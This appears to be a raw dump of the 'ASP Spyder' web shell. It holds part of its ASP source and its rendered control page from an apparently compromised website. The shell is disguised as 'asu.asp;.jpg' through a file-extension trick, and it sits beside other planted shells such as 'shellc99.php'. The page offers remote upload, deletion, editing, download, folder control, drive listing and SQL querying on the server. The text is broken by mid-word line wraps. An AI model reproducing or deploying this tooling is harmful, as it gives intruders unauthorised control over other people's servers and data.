Response.Write "<BR></td></tr><tr><td align=center ><B>Listed: " & fo & "</b></td><td align=center ><b>Listed: " & fi & "</b></td></tr></table><BR>" ' ---View Tree Ends Here ' ---Upload Routine starts here %> <form method="post" ENCTYPE="multipart/form-data" action="<%=Request.Ser vervariables("SCRIPT_NAME")%>?upload=@&txtpath=<%=MyPath%>"> <table bgcolor="#505050" cellpadding="8"> <tr> <td bgcolor=#303030 valign="bottom"><font size=+1 face=wingdings color=Gray >2</font><font face="Arial" size=-2 color="#ff8300"> SELECT FILES TO UPLOAD:<br> <input TYPE="FILE" SIZE="53" NAME="FILE1"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE2"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE3"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE4"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE5"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE6"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE7"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE8"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE9"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE10"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE11"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE12"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE13"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE14"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE15"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE16"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE17"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE18"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE19"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE20"><BR> &nbsp;&nbsp;<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="I f you recieve an error while uploading, then most likely you do not have write a ccess to disk !!"> </font></td> </tr> </table> <BR> <table bgcolor="#505050" cellpadding="6"> <tr> <td bgcolor="#000000" valign="bottom"><font face="Arial" size="-2" color=gra y>NOTE FOR UPLOAD YOU MUST HAVE VBSCRIPT v5.0 INSTALLED ON YOUR WEB SERVER&nbsp; FOR THIS LIBR ARY TO FUNCTION CORRECTLY. YOU CAN OBTAIN IT FREE FROM MICROSOFT WHEN YOU INSTALL I NTERNET EXPLORER 5.0 OR LATER. WHICH IS, MOST LIKELY, ALREADY INSTALLED.</font></td> </tr> </table> </form> <% ' ---Upload Routine stops here %> </font><HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></ font><BR><font size=1 face=arial>[ System: <%=now%> ]</font></p><BR> </body></html> <html>

<style> <!-A:link {font-style: text-decoration: none; color: #c8c8c8} A:visited {font-style: text-decoration: none; color: #777777} A:active {font-style: text-decoration: none; color: #ff8300} A:hover {font-style: text-decoration: cursor: hand; color: #ff8300} * {scrollbar-base-color:#777777; scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-facecolor:#505050; scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight -color:#303030;} input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:non e;border:1px solid #000000;} //--> </style> <title>D:\nelsontool_website</title> </head> <body bgcolor=black text=white topAprgin="0"> <!-- Copyright aSU_aBANG --> <HEAD> <SCRIPT Language="VBScript"> sub getit(thestuff) if right("D:\nelsontool_website\",1) <> "\" Then document.myform.txtpath.value = "D:\nelsontool_website\" & "\" & thestuff Else document.myform.txtpath.value = "D:\nelsontool_website\" & thestuff End If document.myform.submit() End sub </SCRIPT> </HEAD> <font face=arial size=-1 color=red>Path not found...</font> <center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font col or=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shag alot</TT></font></center> <font face=Courier> <table><tr><td> <form method="post" action="/asu.asp;.jpg" name="myform" > <Table bgcolor=#505050 ><tr><td bgcolor=#505050 > <font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> Data </td></tr> <tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color= gray>Virtual:;.jpg</Font><BR><font face=wing dings color=Gray >1</font><font face=Arial size=+1 > D:\nelsontool_website\</Fon t> <BR><input type=text width=40 size=60 name=txtpath value="D:\nelsontool_website\ " ><input type=submit name=cmd value=" View " > </td></tr></form></table> </td><td><center> <table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="/asu.asp;.j pg?getDRVs=@&txtpath=D:\nelsontool_website"><font size=-2 face=arial>Retrieve Av ailable Network Drives</a></td></tr> <tr><td bgcolor=black align=right><A HREF="/asu.asp;.jpg?qa=@&txtpath=D:\nelsont ool_website"><font size=-2 face=arial>SQL Query Analyser</A></td></tr> <tr><td bgcolor=black align=right><A HREF="/asu.asp;.jpg?logoff=@&...thankyou.f or.using.ASpyder....~sir_shagalot!..[]"><font size=-2 face=arial> +++LOGOFF+++</A></td></tr></table> </td></tr></table>

<p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td> <form method="post" action="/asu.asp;.jpg" ><font face=arial size=-1 >Delete fil e from current directory:</font><BR> <select size=1 name=ToDelete > <option>------------------------------</option>" <option>404.php;.jpg</option><option>asu.asp;.jpg</option><option> p</option><option>contact.asp</option><option>contact.php</option><option>contac tProcess.asp</option><option>content.asp</option><option>customerFTPPage.asp</op tion><option>customerLoginError.asp</option><option>customerPage.asp</option><op tion>documentsPage.asp</option><option>index.asp</option><option>jundab.htm</opt ion><option>loginProcess.asp</option><option>logOut.asp</option><option>menu.asp </option><option>readme.html</option><option>searchResults.asp</option><option>s hellc99.php</option><option>syslog.html</option><option>test.html</option><optio n>top.asp</option><option>website.asp</option><option>websiteLayout.asp</option> </select><input type=hidden name=txtpath value="D:\nelsontool_website"><input ty pe=Submit name=cmd value=Delete ></form></td><td><form method=post name=frmCopyF ile action="/asu.asp;.jpg" ><font face=arial size=-1 >Copy file too current dire ctory:</font><br><select size=1 name=ToCopy ><option>-----------------------------</option></select><input type=hidden name=txtpath value="D:\nelsontool_websit e"><input type=Submit name=cmd value=" Copy " ></form></td></tr></Table><table Cellpading=2 width=75% bgcolor=#505050 ><tr><td valign=top width=50% bgcolor=#30 3030 >Folders:<BR><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#c8c 8c8><span style='cursor: hand;' OnClick="getit('..')">..</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: han d;' OnClick="getit('approvedDocs')">approvedDocs</span></FONT><BR><font face=win gdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnCl ick="getit('aspnet_client')">aspnet_client</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="g etit('brochure')">brochure</span></FONT><BR><font face=wingdings color=Gray >0</ font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('cgi-bin')" >cgi-bin</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR= #eeeeee><span style='cursor: hand;' OnClick="getit('css')">css</span></FONT><BR> <font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='curso r: hand;' OnClick="getit('img')">img</span></FONT><BR><font face=wingdings color =Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit(' inc')">inc</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLO R=#eeeeee><span style='cursor: hand;' OnClick="getit('ss')">ss</span></FONT><BR> <font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='curso r: hand;' OnClick="getit('upload')">upload</span></FONT><BR><font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick="g etit('was')">was</span></FONT><BR><font face=wingdings color=Gray >0</font> <FON T COLOR=#eeeeee><span style='cursor: hand;' OnClick="getit('xsl')">xsl</span></F ONT><BR> <BR><center><form method=post action="/asu.asp;.jpg?txtpath=D:\nelsontool_websit e"> <table bgcolor=#505050 cellspacing=4><tr><td> <font face=arial size=-1 title="Create and Delete folders by entering their name s here manually.">Directory:</td></tr> <tr><td align=right ><input type=text size=20 name=DirName><BR> <input type=submit name=cmd value=Create><input type=submit name=cmd value=Delet e><input type=hidden name=DirStuff value=@> </tr></td></table></form> <BR></td><td valign=top width=50% bgcolor=#303030 >Files:<BR><BR> <form method=post name=frmCopySelected action="/asu.asp;.jpg?txtpath=D:\ nelsontool_website"> <center><select name=Fname size=27 style="background-color: rgb(48,48,48); color : rgb(210,210,210)"><option value="404.php;.jpg">&nbsp;&nbsp;404.php;.jpg -- [43 kb]</option><option value="asu.asp;.jpg">&nbsp;&nbsp;asu.asp;.jpg -- [35 kb]</o ption><option value="companyPage.asp">&nbsp;&nbsp;companyPage.asp -- [4 kb]</opt ion><option value="contact.asp">&nbsp;&nbsp;contact.asp -- [4 kb]</option><optio

n value="contact.php">&nbsp;&nbsp;contact.php -- [31 kb]</option><option value=" contactProcess.asp">&nbsp;&nbsp;contactProcess.asp -- [1 kb]</option><option val ue="content.asp">&nbsp;&nbsp;content.asp -- [8 kb]</option><option value="custom erFTPPage.asp">&nbsp;&nbsp;customerFTPPage.asp -- [5 kb]</option><option value=" customerLoginError.asp">&nbsp;&nbsp;customerLoginError.asp -- [4 kb]</option><op tion value="customerPage.asp">&nbsp;&nbsp;customerPage.asp -- [5 kb]</option><op tion value="documentsPage.asp">&nbsp;&nbsp;documentsPage.asp -- [10 kb]</option> <option value="index.asp">&nbsp;&nbsp;index.asp -- [1 kb]</option><option value= "jundab.htm">&nbsp;&nbsp;jundab.htm -- [2 kb]</option><option value="loginProces s.asp">&nbsp;&nbsp;loginProcess.asp -- [3 kb]</option><option value="logOut.asp" >&nbsp;&nbsp;logOut.asp -- [1 kb]</option><option value="menu.asp">&nbsp;&nbsp;m enu.asp -- [11 kb]</option><option value="readme.html">&nbsp;&nbsp;readme.html - [18 kb]</option><option value="searchResults.asp">&nbsp;&nbsp; p -- [10 kb]</option><option value="shellc99.php">&nbsp;&nbsp;shellc99.php -- [2 9 kb]</option><option value="syslog.html">&nbsp;&nbsp;syslog.html -- [4 kb]</opt ion><option value="test.html">&nbsp;&nbsp;test.html -- [14 kb]</option><option v alue="top.asp">&nbsp;&nbsp;top.asp -- [4 kb]</option><option value="website.asp" >&nbsp;&nbsp;website.asp -- [6 kb]</option><option value="websiteLayout.asp">&nb sp;&nbsp;websiteLayout.asp -- [5 kb]</option></select><br><input type=submit nam e=cmd value=" Copy "><input type=submit name=cmd value="Edit/Create"><input type=submit name=cmd value=Download> </form> <BR></td></tr><tr><td align=center ><B>Listed: 11</b></td><td align=center ><b>L isted: 24</b></td></tr></table><BR> <form method="post" ENCTYPE="multipart/form-data" action="/asu.asp;.jpg? upload=@&txtpath=D:\nelsontool_website"> <table bgcolor="#505050" cellpadding="8"> <tr> <td bgcolor=#303030 valign="bottom"><font size=+1 face=wingdings color=Gray >2</font><font face="Arial" size=-2 color="#ff8300"> SELECT FILES TO UPLOAD:<br> <input TYPE="FILE" SIZE="53" NAME="FILE1"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE2"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE3"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE4"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE5"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE6"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE7"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE8"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE9"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE10"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE11"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE12"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE13"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE14"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE15"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE16"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE17"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE18"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE19"><BR> <input TYPE="FILE" SIZE="53" NAME="FILE20"><BR> &nbsp;&nbsp;<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="I f you recieve an error while uploading, then most likely you do not have write a ccess to disk !!"> </font></td> </tr> </table> <BR> <table bgcolor="#505050" cellpadding="6"> <tr>

<td bgcolor="#000000" valign="bottom"><font face="Arial" size="-2" color=gra y>NOTE FOR UPLOAD YOU MUST HAVE VBSCRIPT v5.0 INSTALLED ON YOUR WEB SERVER&nbsp; FOR THIS LIBR ARY TO FUNCTION CORRECTLY. YOU CAN OBTAIN IT FREE FROM MICROSOFT WHEN YOU INSTALL I NTERNET EXPLORER 5.0 OR LATER. WHICH IS, MOST LIKELY, ALREADY INSTALLED.</font></td> </tr> </table> </form> </font><HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></ font><BR><font size=1 face=arial>[ System: 17/02/2012 15:32:50 ]</font></p><BR> </body></html>

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